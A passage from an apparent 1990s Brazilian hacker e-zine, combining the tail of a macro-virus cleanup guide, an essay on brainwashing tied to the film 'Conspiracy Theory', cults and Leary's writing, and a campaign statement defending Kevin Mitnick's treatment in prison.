tentada em ultimo caso. Delete o arquivo NORMAL.DOT. Automaticamente,
o Word criara outro NORMAL.DOT, com as configuracoes-padrao do
programa. A desvantagem e que voce perdera as suas configuracoes
personalizadas: se voce tinha alguma configuracao personalizada
(Autotexto, Macros, barras de Ferramentas personalizadas), elas serao
perdidas. Mas pelo menos, voce tem a certeza de que as sequelas
sumirao.

Agora, de nada adianta tudo isto se voce ainda tiver algum documento
do Word infectado no seu computador, que pode infectar o NORMAL.DOT
novamente a qualquer momento. Passe o anti-virus antes de fazer o
descrito acima.

Depois de terminar o reparo, nao esqueca de colocar o novo
NORMAL.DOT como somente-leitura.

------------------------------

MAIS INFORMACOES SOBRE VIRUS DE MACRO voce pode obter nas paginas:
http://www.microsoft.com/office/antivirus/
http://www.microsoft.com/MSWordSupport/content/usage/MacroVirus/
http://www.mcafee.com/t0016.html
http://www.datafellows.com/macro/word.htm
http://www.bis.com.br/~lafanet

------------------------------

Peco a todos os que chegaram ate o fim deste texto que se juntem a
esta ideia. Alias, esta ideia nada deve ter de original!

Nao tenho dados, mas estimo que 99% dos usuarios de Internet nao
usam anti-virus, ou tem anti-virus atrasados. E que 90% dos usuarios
de Word tem um virus de macro, mas nunca perceberam, ou, se
perceberam, deixam o bichinho la' quieto, apesar do incomodo que eles
causam.

----------------------------------------------------------------------

PAULO GUSTAVO SAMPAIO ANDRADE
Estudante de Direito na UFPI
Editor da pagina juridica "Jus Navigandi"
(http://www.geocities.com/Paris/1997)
Teresina - Piaui - Brazil
E-mail: jus@mail.org
                   Batalha pela Mente: Lavagem Cerebral

Derneval R.R. da Cunha

As pessoas que foram assistir o filme "Teoria da Conspiracao", entrando em
cartaz recentemente, podem pensar algumas das seguintes ideias:

   * Nao gostei.
   * Nao entendi
   * Adorei
   * Esse cara parece alguem que conheco. Vou avisar pro cara que ele nao
     esta sozinho no Universo. Ja pode fazer contato.

E' , a coisa pode ser engracada. Para quem nao viu o filme, vou resumir um
pouco. O personagem interpretado por Mel Gibson e um cidadao comum ou coisa
do genero que tem como hobby ler jornais em busca das "entrelinhas" de cada
coisa e procura editar essas entrelinhas num "fanzine" ou "pasquim" que
leva o nome de "Teoria da Conspiracao". O grande amor da vida dele e uma
funcionaria do governo e por ai vai. A vida do sujeito e dirigir o taxi
dele, editar o fanzine, distribui-lo e ficar de olho no "grande amor da
vida dele". Literalmente de olho. Ou como diria alguem, praticando a
"substituicao do sexo pela contemplacao passiva da folha da
alcachofra"(Luiz F.Verissimo?). Ate acontecer uma serie de coisas estranhas
na vida do cara. Ele esta sendo perseguido. Ninguem acredita na historia
dele, porque ele vive inventando historias. Coisa mais ou menos nessa linha
abaixo:

   * "O movimento hippie foi criado em Moscou e, se os pais nao orientarem
     cuidadosamente a juventude, o comunismo acabara dominando o Brasil"(1)
     "A mais abominavel tatica - dos comunistas - e a da disseminacao das
     drogas, que ira destruir mais a proxima geracao do que a nossa, ja que
     ataca nossos filhos"(2)
   * "O sexo e um instrumento usado pelos psicopoliticos para perverter e
     alienar a personalidade dos individuos, principalmente das
     autoridades, para anula-las e converte-las em escravos servis. Dai
     partirem para o descredito das familias, dos governos, e passam à
     degradacao da nacao, bem como intensificam a divulgacao da literatura
     erotica e da promiscuidade sexual (3)
   * "A Russia tem conseguido alterar a literatura democratica dos Estados
     Unidos e tem introduzido naquela nacao os principios de Marx e os
     dados do materialismo dialetico nos textos estudantis de psicologia,
     ate o ponto em que qualquer um que estude a fundo a psicologia, se
     convertera em candidato a comunista militante. Quase todas as catedras
     de psicologia dos EUA estao nas maos dos comunistas"(3).
   * "Quase todos (os jornalistas que cobrem a Camara dos Deputados) sao
     criptocomunistas, especialmente os bigodudos. Reporter comunista eu
     conheco pelo jargao que usa" (4).
   * "O inimigo e indefinido, usa mimetismo, se adapta a qualquer ambiente
     e usa todos os meios, licitos e ilicitos para lograr seus objetivos.
     Ele se disfarca de sacerdote ou de professor, de aluno ou de campones,
     de vigilante defensor da democracia ou de intelectual avancado, de
     piedoso ou de extremado protestante; vai ao campo e às escolas, às
     fabricas e às igrejas, à catedra e à magistratura; usara, se
     necessario, o uniforme ou o traje civil; enfim, desempenhara qualquer
     papel que considerar conveniente para enganar, mentir e conquistar a
     boa-fe dos povos ocidentais"(5)

E'  um filme movimentado. O motivo central para se acreditar, para se
entender a coisa toda, e um lance que parece realmente historia de cinema e
no entanto, ja foi comprovada na vida, chamada lavagem cerebral.

O termo foi criado mais ou menos na epoca da Guerra da Coreia, quando se
constatou varios casos de militares norte-americanos que colaboraram com o
inimigo, chegando mesmo ao ponto de virarem a casaca e nao quererem mais
voltar para casa, quando a guerra acabou. Uma coisa meio assustadora,
quando se pensa nisso. Ha quem duvide. A coisa ficou meio no esquecimento,
ate que vieram os 60 e 70. Houve o caso Patricia Hearst, que ate ja virou
filme, a historia de uma estudante (filha de um super-empresario da
imprensa americana, o Chato de la, que tambem foi retratado no filme
"Cidadao Kane" altamente recomendavel). Essa menina estava noiva, ia se
casar, foi sequetrada por um grupo de guerrilha urbana, chamado Exercito
Simbiones de Libertacao. Alguns meses depois, a "patricinha" apareceu em
todos os jornais, nao mais como vitima, mas como nova integrante do tal
"exercito". Como se explica tal metamorfose, de "loira burra" a
guerrilheira urbana?  Ou como seu pai disse, na epoca:

     "Nos a tivemos durante vinte anos. Eles a tem ha apenas 60 dias.
     Nao acredito que possa ter mudado sua filosofia tao rapidamente -
     e muito menos para sempre". .

Aqueles que assistiram o filme "Nascido para Matar" tem uma ideia do que o
processo de pegar um individuo qualquer e transforma-lo numa maquina de
guerra. Nao basta colocar uma arma na mao de um sujeito. Como e que voce
pode pegar um sujeito qualquer, forca-lo a deixar a convivencia da sua
familia, ir morar num local junto com sei la quantos, acabar com a
liberdade dele, etc, e ainda esperar que esse cara va arriscar a propria
vida para que voce fique seguro em sua casa, seu trabalho, etc.. Pior
ainda, como esperar que ele nao se revolte e mate o superior dele?
Elementar, voce cria um programa de treinamento chamado Servico Militar.
Quem participa constata que, depois de alguns meses, ate se acostuma e
depois inclusive acha graca na vida de militar. Ja vi muitos terem orgulho
de ter participado, mesmo lembrando que antes nao queriam coisa alguma la
dentro. Coisa estranha, a pessoa mudar assim da agua pro vinho.. acontece.

Mas nao e so o Exercito que consegue transformar a pessoa. Alguns cultos
religiosos tambem sao acusados de tais praticas, de reduzir seus seguidores
a meros robos, capazes inclusive de matar, como mostra o caso de Lynete
(vide mais adiante) que tentou anos atras matar o entao presidente Gerald
Ford ou o caso doa seita Ensino da Verdade Suprema, criada pelo guru Shoko
Asahara e que causou um atentado terrorista com gas Sarin, no metro de
Toquio, em marco de 95.

O melhor porem e pegar um texto que explica um pouco mais, como funciona
nossa cabeca, nesses casos. Com a palavra, Timothy Leary:

     (...) Entre sua detencao por apontar uma arma contra Gerald Ford,
     em setembro, de 1975, e sua condenacao, em novembro deste ano ,
     Lynette "Squeaky" Fromme nao fez nada para ajudar sua defesa e
     fez de tudo para divulgar a filosofia de Charles Mason - o cabeca
     do grupo que em agosto de 1969 chacinou a atriz Sharon Tate e
     mais tres pessoas com requintes de extrema crueldade. Lynette se
     orgulhava de ter sido a primeira mulher a ser admitida na
     "familia" Mason, de quem recebera uma intensa lavagem cerebral. E
     , durante o julgamento, nao houve palavra do juiz ou mesmo do seu
     proprio advogado que a fizesse se dar conta de sua situacao
     legal. O que lhr interessava era tao somente o fato de ter
     atraido a atencao dos meios de divulgacao para propagar a
     ideologia de Mason

     * * * * *

     Nao nada que indique nenhuma fraqueza especial por parte de
     Patty, Rusty ou Squeaky. Os tres eram americanos bastante normais
     ate que penetraram nos ambientes do Exercito Simbiones de
     Libertacao, do Exercito americano e da familia Mason,
     respectivamente. E e essa a primeira licao que temos que
     aprender: a lavagem cerebral, como a malaria, e uma doenca que se
     pega por contagio.

     Claro, o conceito de "lavagem cerebral", nada tem de cientifico.
     Afinal, o cerebro nao e uma coisa suja, que possa ser lavada, mas
     sim um computador bio-eletrico, com mais de trinta bilhões de
     celulas nervosas capazes de realizar 102 783 000 interconexões,
     numero esse superior ao total de estrede estrelas do universo.

     Tanto quanto o sistema nervoso e o resto do nosso corpo , o
     cerebro e projetado e programado pelo codigo genetico : somos
     formados por DNA para produzir mais DNA. Em outras palavras, por
     mais que isso choque os teologos e os humanistas, somos todos
     robos neurogenicos, uma condicao da qual nao poderemos escapar
     enquanto nao aprendermos a dominar o nosso sistema nervoso de
     forma a reprogramar nossos destinos.

     Um exemplo da progrmacao cerebral foi levantado a partir de uma
     girafa recem-nascida cuja mae foi abatida por um cacador. A
     girafinha -de acordo com sua programacao genetica - se fixou no
     primeiro objeto que se movia ao seu redor, o jipe do cacador,
     seguindo-o, tentando mamar nele - isto e, identificando-o com a
     sua mae.

     Essa mesma fixacao - ou imprint - a um objeto externo tambem
     acontece com seres humanos. No caso em quatro etapas.

     1. O circuito de bio-sobrevivencia infantil, ou consciencia, que
     lida com os sinais de perigo-e-seguranca.

     2. O circuito da crianca mais velha, ou ego, ligado ao movimento
     e a emocao.

     3. O circuito simbolico-verbal do estudante, ou mente relacionado
     com a linguagem e o conhecimento.

     4. O circuito socio-sexual do adulto, ou personalidade, ligado,
     ou personalidade, ligado ao comportamento.

     Esses quatro circuitos sao os quatro "cerebros" cujos os
     conteudos sao progressivamente apagados e reimpressos durante o
     processo mecanicamente simples da lavagem cerebral.

     O primeiro circuito, ou cerebro da bio-sobrevivencia, e ativado
     assim que se nasce. Sua funcao e a de buscar alimento, ar, calor
     e conforto, rejeitando o que quer que signifique perigo,
     impureza, ameaca. Esse trabalho e centrado em torno da presenca
     da mae - ou de qualquer coisa que venha a substitui-la., como o
     caso da girafinha.

     Durante toda a vida, quando o cerebro da bio-sobrevivencia
     detecta perigo, todas as demais atividades mentais cessam. Esse
     conceito e fundamental para a programacao cerebral. Para que se
     crie um novo imprint, e preciso, inicialmente, reduzir-se o
     paciente a um estado infantil, isto e, vulneravel em seu primeiro
     cerebro. Nesse processo, o paso incial consiste no isolamento da
     vitima, de preferencia num ambiente pequeno onde nao atuem as
     tecnicas mentais que originalmente cuidavam da sobrevivencia do
     recluso. Na verdade bastam poucas horas ate que a ansiedade se
     manifeste no detido, e so alguns dias para que surjam as
     alucinacões, um sinal claro de que a vitima esta pronta para
     receber o imprint de um novo objeto maternal. Para um prisioneiro
     humano. Qualquer bipede que lhe trouxer comida sera aceito como
     uma nova mae.

No caso do filme "Teoria da Conspiracao", do qual falamos no inicio do
artigo, a coisa vai um pouco mais alem, que e onde comeca a ficar realmente
inacreditavel, principalmente por quem nao teve acesso ao tipo de
informacões que a imprensa trouxe ao publico, durante o tempo em que nosso
pais se encontrava sob censura. Por outro lado, com tanta informacao
disponivel, nao e um assunto em voga hoje, como ja foi em outras epocas. Um
livro que ajuda a entender melhor o filme (nao vou contar, obvio) e "A
Programacao de Candy Jones" de Donald Bain. Nele, a coisa e um pouco mais
assustadora. A CIA teria criado um programa de estudos com drogras
alteradoras da mente, com o intuito de verificar seu potencial para
manipular pessoas. Isso e um fato, nao e ficcao. Quando um sujeito, que
recebeu LSD sem ser avisado, pulou do alto de um predio, a coisa veio a
publico e em 1973, todo o material que tinha sido produzido foi destruido.

Mas veja como a coisa pode ser complexa: todo mundo que ja saiu pelos
"bares da vida" tem alguma historia de bebado pra contar. Quer um exemplo
maior, pensem na historia da finada Re Bordosa, personagem do Angeli.
Basicamente uma mulher que bebia alguns copos de bebida e acordava no dia
seguinte na banheira, sem saber o que tinha feito. Na vida real, ha pessoas
sob acao do alcool que funcionam desse jeito. Bebem, sofrem uma metamorfose
total e depois quando acordam, nao se lembram mais. Amnesia (e ressaca).
 So pra se ter uma ideia, no codigo penal (ou processo penal, eu li, ta num
desses dois) ta la uma legislacao qualquer que "exime de culpa o crime
cometido sob influencia do alcool". Nao sei ate que ponto funciona, e bom
procurar um advogado pra checar isso, faz algum tempo que li e nao sou
expert no assunto. Pelo menos o que li seria que assim como "razao de
insanidade", "embriagues" poderia em casos bem especificos, inocentar a
pessoa.

Claro que a ideia da CIA nao era de embebedar o cara e mandar bancar o
James Bond por ai. Nao. No livro que mencionei acima, a ideia era pegar um
cidadao especifico, no caso foi usada como cobaia uma radialista americana,
uma Leila Cordeiro  ou Bruna Lombardi, sei la (traduzindo aquela epoca pra
hoje) que era bastante suscetivel a hipnotismo e que tinha tido episodios
de mudanca de personalidade na infancia. Atraves do uso de drogas
especificas, uma sub-secao da CIA trabalhou com essa mulher e .. conseguiu
fazer aparecer as personalidades "adormecidas" no fundo da cabeca dela. No
final de cada sessao de "terapia", mandavam ela se esquecer de tudo. Olha a
vantagem da coisa: ja foi super explorado no cinema a historia de pessoas
com multiplas personalidades. Agora imagina uma pessoa que alterna uma
personalidade completamente inocente do mundo, tipo loira burra, com a de
uma agente secreto treinado para desempenhar missões. Pois e, cada sessao,
dopavam a mulher de forma a aparecer aquela personalidade que era mais
agressiva, menos carinhosa, mais desumana, bem tipo mae de namorada quando
vira "sogra".

E' , isso parece coisa de historia em quadrinhos. Ate hoje nao tenho muita
certeza se acredito, mesmo o livro mostrando fotos e documentos sobre como
a coisa aconteceu. (Tem ate uma bibliografia na rede, como por exemplo:
Martin A.Lee, Bruce Shlain ACID DREAMS -- The Complete Social History of
LSD: The CIA, the Sixties, and Beyond) .  Ai outro dia li uns papeis na
rede sobre cultos que praticam a lavagem cerebral e o fato e que a grande
maioria dos jovens que passam por uma coisa dessas, tambem nao acreditam
que o que aconteceu com eles foi uma coisa malefica ou que era uma
experiencia pela qual eles nao queriam passar. Na verdade, existe um
trabalho cientifico, feito com estudantes e gente comum, la nos EUA, foi
ate publicado no Brasil, sobre essa questao de como e facil convencer
alguem a seguir ordens inclusive ordens que signifiquem a morte de outra
pessoa, se um "motivo correto" for apresentado.

Chamaram duas equipes de estudantes, uma, que sabia o que estava sendo
feito, era composta de gente de arte dramatica. A outra, gente escolhida
mais ou menos aleatoriamente. O cara entrava numa sala e via um interruptor
que dava choques em uma pessoa do outro lado de uma parede de vidro
espelhado, tipo oculos ray-ban. O estudante recebia a ordem de dar choques
na "vitima", de acordo com as ordens do "professor". A ideia era ver ate
ponto o estudante aceitava continuar eletrocutando a "vitima" (que era
estudante de arte dramatica e nao sofria porcaria nenhuma, so fingia e
implorava pra nao continuarem os choques). Se o estudante protestava, o
"professor" insistia que era necessario aumentar a dose do choque. Varios
continuaram com a experiencia ate "matarem"  a vitima. Poucos, bem poucos,
se revoltaram e decidiram nao continuar e por assim dizer, fizeram algo
proximo de mandar o "professor"  à merda.

Voltando ao Timothy Leary:

     "O trabalho de lavagem cerebral e relativamente simples,
     consistindo basicamente na troca de alguns circuitos roboticos
     por outros. Assim que a vitima passa a encarar o reprogramador
     como a crianca encara seus pais - fornecedores de seguranca vital
     e de apoio para o ego - qualquer nova ideologia pode ser
     inculcada no cerebro."

     "Durante o estagio de vulnerabilidade, qualquer pessoa pode ser
     convertida a qualquer sistema de valores. Facilmente podemos ser
     induzidos a entoar "Hare Krishna, Hare Krishna" como "Jesus
     morreu por nos", ou a bradar "abaixo o Vaticano", aceitando
     plenamente as ideologias que estao por tras desses temas. O passo
     seguinte, na lavagem cerebral, consistira em nos convencer de que
     qualquer pessoa que nao partilhe dos nossos novos valores sera
     sempre debil, estupida ou louca".

     "Para reforcar os valores da nova realidade recem-incorporada, e
     preciso que haja uma realimentacao das novas coordenadas que nos
     estao sendo impostas. A grande ironia e que o nosso conceito de
     realidade e tao fragil que pode se desfazer em apenas alguns
     dias, caso nao tenhamos constantes mensagens que nos reafirmem
     quem somos e que a nossa realidade continua existindo".

     "Bem a proposito, o Exercito constroi uma "ilha" totalmente
     militarizada para os seus efetivos. E ilhas similares sao
     erigidas por qualquer outro movimento que implique numa lavagem
     cerebral, seja ele politico, mistico ou esoterico."

No exercito, a preocupacao, ao contrario do que possa parecer num filme de
Rambo, nao e ensinar a matar, nem a sobreviver na selva, muito menos lavar
as latrinas. Isso e consequencia. A preocupacao basica, razao de ser do
militar e defender a patria e os cidadaos. Para isso, ele precisa aprender
a cumprir ordens. Ai e que mora o perigo. Tudo e feito para que o "reco"
(soldado e so depois do treinamento basico) nao precise pensar, so
obedecer. Tem muito filme por ai, alguns ate folcloricos (o diretor
contando a maravilha do servico militar no tempo dele) sobre esse lance
entao nem vou comentar muito.  Hoje em dia, o exercito brasileiro nao
representa o mesmo perigo que representava na minha juventude, quando tinha
pais que chegavam no dia do exame medico do filho e insistiam para que ele
fosse escolhido para servir. So quem faz medicina e que ta obrigado a fazer
sem chance de escapar com facilidade.

Mais facil de acontecer e cair numa seita mistica. Sao muitas as razões
para isso. O sujeito vai estudar ou trabalhar fora, longe da cidade dele.
Nao conhece ninguem. Uma seita mistica e uma forma de se enturmar, conhecer
gente interessante. De repente, e um universo diferente, onde tudo parece
ser mais facil. Ninguem fala em morte, assalto, falta de dinheiro. Fala-se
apenas em fe e falta de fe. E o mais incrivel, sao pessoas que escutam
quando voce tem um problema, ajudam ou tentam te ajudar quando voce esta
sem grana. Claro, tem alguns principios que voce tem que aceitar. Dormir,
por exemplo, nao pode. Fechou os olhos um pouquinho, tem que escutar "ate
quando, dorminhoco, vais continuar dormindo, isso esta aqui na Biblia, vai
negar a palavra de Deus, esta perdendo a fe?". Tambem nao pode conversar em
outra coisa que nao seja a palavra de Deus, a salvacao, a possibilidade de
um dia ser elevado a condicao de chefe de grupo (coisa que nunca acontece)
e .. arrumar algumas contribuicões para engrandecer o trabalho de Deus aqui
na Terra, trabalhando tanto para mostrar a devocao como para preparar o
espirito para o apocalipse, onde so os dignos serao salvos. Claro,
masturbacao e pecado. A propria pessoa fica com vergonha de tocar o proprio
corpo. Homens so conversam com homens e mulheres so conversam com mulheres.
Conversei com ex-convertidos. Um pessoal legal. Um deles me entregou um
livro chamado: "Os guerreiros da virgem" de Jose Antonio Pedriali.  Conta
toda essa trajetoria de um rapaz que achava que sua missao na Terra era
salvar o mundo do diabo. Deve ser algo irresistivel, ir atras da salvacao
do mundo. Tem um outro livro que esta proibido, mas volta e meia recebo
noticia dele existindo na internet, escrito por um pastor de uma igreja ai:
"Os Bastidores do Reino". No  http://www.clark.net/pub/times9/brainwsh.html
tem algumas das tecnicas usadas. O resultado pode ser devastador.(ver
tambem  http://www.inlink.com/~dhchase/books2.htm).

Um amigo me contou, num email, muito tempo atras, sob o trabalho de um
culto mistico na cidade dele. Primeiro, apareceram uns caras com ideias de
bate-papos religiosos e esotericos, andando vestidos de forma bem austera e
nao ficavam nem bebendo nem jogando. Os pais de familia nao falam nada
contra, nem tem porque, no inicio. A mudanca parece ate boa, nao parece que
o garoto esta mexendo com drogas, parou de ouvir musica alta, nao pede mais
o carro emprestado. Fica so curtindo religiao. Ai o comodismo comeca a se
transformar em duvida. "Sera que meu filho vai virar padre?" So quando
finalmente toma coragem e chama o filho para a conversa, descobre que e
ouvido. E nao tem problema. Acha que o culto ta amadurecendo o cara. A mae
nem reconhece mais. Ai chega o ponto em que o culto comeca a avisar o novo
membro que a familia esta influenciada pelo demonio e e necessario morar um
tempo fora, mais perto da fe que ele esta abracando, para aprender a se
defender. Afinal de contas, muitas cabecas juntas oram pela salvacao bem
melhor do que uma. La na sede, batalharao por um mundo livre de mas
influencias. Os caras que saem da cidade desse jeito, disse meu amigo,
nenhum volta. Um, porque e uma aventura sair da cidade onde se morou a vida
e toda. Outra, porque voltar e sempre mais dificil. Lendo pela rede vi uns
papers assustadores.

A pessoa demora a se acostumar com a ideia de que dedicou tanto sentimento
e louvor a toa.. Existem alguns cultos que contam com grupos de auto-ajuda,
semelhantes a Alcoolicos Anonimos, para dar apoio moral aos que estao dando
o dificil passo de cair fora de uma coisa que ja deu o que tinha que dar.
Tem que ter ajuda senao o cara volta, porque o vazio emocional e muito
grande. Ai ja nao e mais de querer ter fe, e de nao saber ter vida fora do
culto. A vitima precisa passar por um processo de de programacao em que
TUDO na vida tem que ser revisto. Nem todo mundo consegue se libertar da
ideia de que o mundo nao e cor-de-rosa. Vi um filme na TV em que a familia
teve que contratar  um cara pra sequestrar e iniciar o processo de "abrir a
cabeca do garoto".  Na vida real, o que normalmente acontece nesses grupos
de ajuda e que a familia consegue convencer o sujeito a ir em um territorio
neutro e um ex-praticante do culto fica horas e horas revelando os podres
que o outro ainda nao consegue ver. Acredito que esse tipo de coisa ate
funcione. Ja vi um crente conversar horas com um bebado defendendo seu
culto. Se pudesse conversar com alguem que ja passou por todo o processo e
pulou a cerca pra fora, talvez tenha efeito. O mais incrivel e que as
pessoas nao fazem propaganda disso. Medo de represalias.

O mundo moderno esta ficando muito assustador, impessoal. No Japao, onde
aconteceu aquele caso da tal seita, esses cultos novos representam uma
forma de vida alternativa. Todo ano, 1400 cultos aparecem. E 1400 cultos
tambem desaparecem. Gente que sai de uma seita que oferece a salvacao e vai
para outra seita de salvacao. Salvacao, no caso, e porque a maioria delas
prega que o mundo vai acabar e que so os "escolhidos" daquela seita
especifica, serao salvos. A coisa la (e talvez nao so la, na California,
EUA, tem seita pregando ate que o mundo foi feito por computadores) esta
chegando talvez nesse ponto da historinha abaixo:

     Joe Existencial tava experimentando outras de suas crises
     intelectuais:

     - Puxa, eu simplesmente nao sei em que acreditar..

     Ai chega o cara pra ele, cheio de livros:

     - Po, Joe! Sem grilo. Todas essas confusões e duvidas internas
     estao magicamente resolvidas gracas a minha empresa "Crenca
     Comigo". YEEEEeeeees! Praque gastar anos e anos pastando pelo
     processo de pesquisa e pensamento dos topicos por voce mesmo.
     Simplesmente escolha qualquer um dos nossos sistemas
     pre-racionalizados de crenca e entao conforme-se a ele para o
     resto da vida!!

     - E mais! Sem custo adicional, nos mostramos a voce como evitar
     deixar que novos "fatos" entrem na sua cabeca, assegurando entao
     que nada atrapalhe sua recem-descoberta ilusao de seguranca
     mental.

     Joe entao pensa um pouco:

     - Mas, mas, e se minhas crencas estiverem erradas??

     O carinha responde:

     - Esta e a beleza da coisa, homem. Voce seria o ultimo a saber.
     Mesmo, MESMO, se estivessem erradas ...

     Moral da historinha: "Ah, o cerebro humano funciona que e uma
     beleeeeza".

     (Historinha retirada de uma tira chamada Twisted Image - Ace
     Backwords)

Lavagem Cerebral nao e apenas um conceito usado para definir tais extremas
mudancas de comportamento. O proprio processo de evolucao de uma pessoa ao
longo da vida e uma lavagem cerebral. Quando se torna adolescente, tem
brincadeiras que se abandona, porque "sao coisas de crianca". Quando se
vira adulto, se abandona "coisas de adolescente rebelde". Quando se casa,
se abandona "habitos de solteiro irresponsavel". Ninguem sabe porque, mas
para voce participar de um novo grupo, classe social ou mesmo viver com
gente de outro estado que nao o seu tem que adotar novos codigos de conduta
que nao sao os nossos. Um exemplo muito bom esta ilustrado no filme "o
homem que virou suco", relatando a historia de um nordestino que foi
engolido pela cidade grande, na verdade um cronica social comentando o fato
de que o sujeito que emigra para Sao Paulo, tem que esvaziar a bagagem de
toda uma cultura riquissima de comportamento e absorver outra,
completamente estranha e diferente, onde valentia e solidariedade, por
exemplo, contam menos. Recentemente saiu uma materia na TV comentando que
tem agencia de empregos que so contrata empregada domestica se for de Minas
Gerais ou interior de Sao Paulo. Nordeste, so se for de determinada
religiao.

As pessoas nao param  pra pensar nisso, mas cada revolucao e uma nova
"lavagem cerebral". Quando houve a tal revolucao sexual que nao foi nada
mais nada menos de se poder falar em namorar uma mulher sem intencao de
casar, isso foi dificil para muita gente. Quando aconteceu a Aids, foi bem
mais dificil ainda. Muito adolescente nao queria acreditar que na vez dele,
o sexo estava de novo, proibido. Ou restrito. Para as mulheres, foi legal,
porque antes da revolucao sexual nao podiam transar a nao ser com os
maridos. Por outro lado, depois o dificil era casar. Com a Aids, elas
puderam voltar a pensar em casamento e nao sustentar a coisa so com sexo. E'
algo a se pensar. Atualmente a pessoa e obrigada a administrar essa
"lavagem cerebral", que e acompanhar o mundo a sua volta. Antes que uma
nova revolucao ocorra, a pessoa ja tem que se preparar para uma futura
adaptacao e ja nao estou falando mais de sexo ou de novo tipo de
computador. So que o nome virou "reciclagem". A pessoa precisa ter um tempo
para parar e absorver todos os habitos novos que estao rolando. A parte
mais chata e que e dificil resistir a esse tipo de coisa. Tem gente que so
conversa realmente quando esta na frente de um computador, atraves do CHAT
ou TALK. Ha alguns anos atras, quem comprou videogame pros filhos ficou
condenado a nao entender uma parte do universo deles. Se voce nao tem um
assunto em comum, nao tem dialogo. Fica dificil ate fazer parte de um
grupo. O pior e que novos grupos surgem, com novas opcões de dialogo. E'
dificil, mas cada um precisa parar e pensar da mesma forma que assume um
personagem no universo virtual, qual personagem no  universo real  ela
consegue viver.

      (1) General Belfort Bethlem, comandante (na epoca) do 3o
     Exercito, depois Ministro do Exercito - Jornal O Estado de Sao
     Paulo, 3.7.1977 p.35 (2) General Milton Tavares de Souza, Jornal
     do Brasil 3.10.1976 p.30 (3) Tenente-Coronel Carlos de Oliveira,
     Jornal do Brasil, 19.11.1975 (4) Deputado Jose Bonifacio, lider
     do governo jornal Folha de Sao Paulo, 22.5.1977 (4) General
     Borges Fortes na epoca chefe do Estado Maior do Exercito
     brasileiro, Jornal O Estado de Sao Paulo, 9.9.1973 p.18
JUSTICA JÁ!

Em 06 de agosto de 1996 iniciamos nossa campanha na Internet exigindo um
julgamento e uma sentenca justa para Kevin Mitnick e condicoes carcerarias
saudaveis, haja vista todo o historico de violacoes e maus tratos sofridos
pelo mesmo em situacoes anteriores.

Durante todo este tempo temos acompanhado de perto a luta deste homem pela
sua liberdade. Tivemos a oportunidade de conhecer sua familia, mae e avo, e
partilhar do sofrimento destas pessoas diariamente.

E partilhar da coragem que move todas as maes e avos do mundo, que sao
privadas da companhia dos seus familiares mais queridos.

Acompanhamos as primeiras audiencias onde Kevin era levado ao tribunal
algemado e acorrentado como um prisioneiro de alta periculosidade nao
sendo-lhe permitido usar trajes civis;

Acompanhamos a pratica da tortura sutil, de efeito devastador a longo
prazo, onde os maus tratos evidenciam-se na ameaca velada da solitaria, na
falta do banho diario provocador de erupcoes cutaneas, na devolucao de
nossas correspondencias a fim de isolar o prisioneiro , todas promulgadas a
fim de obter o desespero e o cansaco fisico e emocional do prisioneiro;

Acompanhamos o desespero de sua mae e sua avo que colocaram suas casas a
disposicao da Justica para obter a garantia necessaria para a fianca e a
recusa da mesma;

Temos acompanhado este processo injusto onde Kevin Mitnick foi eleito bode
expiatorio do Governo Americano sem a minima condicao de justica. Nos nao
sabiamos quando iniciamos nossa campanha, que Kevin Mitnick ja havia sido
julgado e sentenciado por seus algozes, notadamente o promotor David
Schindler que insiste em manipular, de forma arbitraria, as questoes
juridicas e legais pertinentes ao caso, para justificar o "circo" em que se
transformou esta legitima "fogueira de vaidades".

Acompanhamos o desvendar das contradicoes promovidas pelos agentes da
condicional onde estava em jogo mais uma sentenca absurda para Kevin
Mitnick.

Acompanhamos., outrossim, as humilhacoes e maus tratos que Kevin tem
sofrido ao longo deste processo,onde ate seus pertences pessoais,
documentos, livros, oculos e roupas foram "confiscados"em dezembro ultimo
quando o mesmo foi colocado na solitaria sob alegacoes as mais variadas,
indo da hilariante caca às sardinhas ate a inusitada transformacao de um
walk-man num microfone secreto. Na verdade o que configurou-se aqui foi
mesmo o roubo dos pertences de Kevin onde, supunham eles, encontrariam a
linha de defesa estudada por Mitnick.

Forjam-se acusacoes e situacoes para condenar de qualquer maneira o mito
Kevin Mitnick e manter o circo armado.

Acompanhamos as manobras maquiavelicas praticadas pelos algozes de Kevin
Mitnick usando a midia e a falta de informacao da populacao em geral ,
disseminando a ideia de que hackers sao criminosos perigosos e merecem o
desprezo da populacao.

Acompanhamos as sentencas injustas que tem sido perpetradas contra Kevin
Mitnick neste julgamento absurdo onde so existem agravantes e onde se paga
duas vezes pelo mesmo erro numa solapacao clara e vergonhosa da Lei.

Acompanhamos estupefatos o silencio da sociedade americana diante desta
clara afronta`a sua Constituicao.

E à terrivel perspectiva de que, num futuro proximo, qualquer cidadao
informatizado do planeta seja um serio candidato a ter sua vida devassada e
sua liberdade ameacada por qualquer Governo arbitrario que ai estabelaca
sua relacao de poder.

A historia tem nos mostrado ao longo do tempo que a autoridade que nao se
baseia na justica degenera em tirania.

Hackers jamais deixarao de existir conquanto sua etica original , a busca
do conhecimento, seja um dos atributos mais facilmente encontrados na raca
humana. E'  preciso saber conviver com este fato na sua complexidade e
viabilizar a questao produtivamente ,como ja esta sendo feito em alguns
paises europeus, aproveitando este conhecimento e nao extinguindo-o.

Kevin Mitnick e um hacker sim. Um purista. Mas nao eh um rotulo. E'  um ser
humano com passado ,um presente, e nele existem pai , mae, familia, amigos,
amores,valores , pessoas e sentimentos..Mas e preciso haver um futuro e
este tera que ser construido por todos nos. Pelos que fazem as leis, pelos
que executam as leis.

Nao podemos mais incorrer em erros historicos que venham a desencadear
distorcoes e abusos onde o ser humano mais uma vez ira sofrer a ira dos
tiranos e o descaso dos ignorantes.

Temos recebido manifestacoes de todas as partes do mundo apoiando nossa
campanha.

Tivemos a pagina acessada por dezenas de ONGs, universidades, pessoas das
mais diversas nacionalidades .

Acompanhamos tranquilos a devassa feita pela Pac Bell(Pacific Bell) na
nossa provedora e a devassa de meu e-mail , numa tentativa inutil de
intimidacao e afronta.

Temos tido tambem momentos da mais absoluta generosidade onde ate um
emprego on- line para Kevin Mitnick foi oferecido por uma empresa de
informatica . Nao era do conhecimento desta empresa o fato de que Kevin
Mitnick foi condenado a ficar por 3 anos longe de qualquer aparelho
eletronico, telefone, etc...tirando-lhe toda e qualquer oportunidade de
refazer sua vida e trabalhar.

-Declaracao Universal dos Direitos doHomem - Artigo XXIII. 1. Todo homem
tem direito ao trabalho, à livre escolha de emprego, a condicoes justas e
favoraveis de trabalho e à protecao contra o desemprego.

Kevin Mitnick esta sendo condenado aqui duas vezes pelo mesmo erro.Onde
esta o cumprimento da lei justa?

